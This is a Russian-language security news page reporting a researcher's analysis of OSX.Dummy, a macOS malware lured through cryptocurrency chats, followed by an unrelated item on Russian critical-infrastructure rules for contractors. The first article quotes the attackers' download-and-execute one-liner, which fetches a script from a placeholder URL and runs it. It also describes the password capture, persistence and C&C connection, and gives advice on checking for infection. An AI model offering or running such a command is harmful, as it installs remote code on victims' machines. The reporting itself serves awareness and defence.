Новый вредонос для macOS атакует криптовалютное сообщество

Новый вредонос для macOS атакует криптовалютное сообщество

Новый вредонос для macOS атакует криптовалютное сообщество

Известный исследователь в области безопасности Патрик Уордл проанализировал новую вредоносную программу для систем macOS, которая атакует криптовалютное сообщество. Вредонос получил имя OSX.Dummy.

«Мне удалось зафиксировать несколько атак на пользователей macOS, они брали свое начало в чатах Slack или Discord, в которых общалось криптовалютное сообщество. В этих чатах люди делятся небольшими сниппетами, чем и воспользовались злоумышленники — вредоносный бинарник загружается и выполняется на компьютерах ничего не подозревающих жертв», — объясняет Ремко Верхов, обнаруживший OSX.Dummy эксперт.

Верхоф уточнил, что люди, маскирующиеся под администраторов групповых чатов, делились небольшими фрагментами кода, который приводил к загрузке и выполнению вредоносной программы. Пример такого фрагмента:

$ cd /tmp && curl -s curl $MALICIOUS_URL > script && chmod +x script && ./script

Уордл отметил, что вредоносный двоичный файл не подписан, это значит, что он будет заблокирован GateKeeper, однако атакующие обошли это ограничение, заставляя жертв загружать и выполнять вредоносный код напрямую с помощью команд терминала.

OSX.Dummy пытается присвоить своему файлу права root, выполнив sudo-команду, однако это потребует от пользователя ввода пароля в терминале. Пароль сохраняется вредоносным кодом в папке /tmp/dumpdummy.

Затем зловред выполняет ряд операций, которые обеспечивают ему укоренение в системе и последующий автоматический запуск.

Вредоносный код также пытается подключиться к C&C-серверу 185[.]243.115.230, используя порт 1337. Если подключение проходит успешно, злоумышленник сможет выполнять команды с root-привилегиями.

«Чтобы првоерить свою систему на предмет заражения этим вредоносом, запустите KnockKnock от root. Ищите неподписанный элемент запуска com.startup.plist, выполняющий нечто с именем «script.sh»», — заключил Уордл.

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

В 2026 году требования по безопасности КИИ распространят на подрядчиков

Поставщикам ИТ-продуктов и услуг для значимых объектов критической инфраструктуры предпишут выполнять те же требования по ИБ, что нынче обязательны для владельцев ЗО КИИ. Соответствующий законопроект уже подготовила ФСТЭК России.

Регулятора беспокоит отсутствие контроля над этим слабым звеном в условиях роста числа атак на КИИ. Договоры с подрядчиками зачастую не предусматривают обеспечение кибербезопасности на должном уровне, а норм, позволяющих заказчику призвать партнера к ответу за плохую защиту, в стране сейчас нет.

«Мы надеемся, что в рамках тех поручений, которые уже имеются, в следующем году в законодательстве появятся обязанности по выполнению подрядчиками ЗО КИИ требования по обеспечению безопасности, и будет проще включать это в договоры», — заявила на московском SOC Forum начальник управления ФСТЭК Елена Торбенко.

По ее словам, в период с января по октябрь 2025 года сотрудники федеральной службы проверили свыше 700 объектов КИИ и выявили 1100 нарушений профильного закона об обеспечении безопасности (N 187-ФЗ).

С 1 сентября вступили в силу поправки, обязывающие субъекты КИИ использовать только отечественный софт и СЗИ. Проведенные ФСТЭК проверки показали, что ее подопечные пока плохо справляются с этим требованием, несмотря на возможные санкции.

В будущем году стараниями регулятора его могут распространить и на сторонние организации, работающие с КИИ. Вероятность таких изменений на законодательном уровне велика: число атак на российские компании через подрядчиков растет.

Вместе с тем подобные поставщики зачастую игнорируют даже базовые меры безопасности, а своевременно отследить и пресечь такие атаки на КИИ очень сложно.

Актуальные проблемы, связанные с КИИ, сегодня обсуждают на онлайн-конференции AM Live. В центре внимания — новые регуляторные требования и повышение защищенности критически важной инфраструктуры.

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru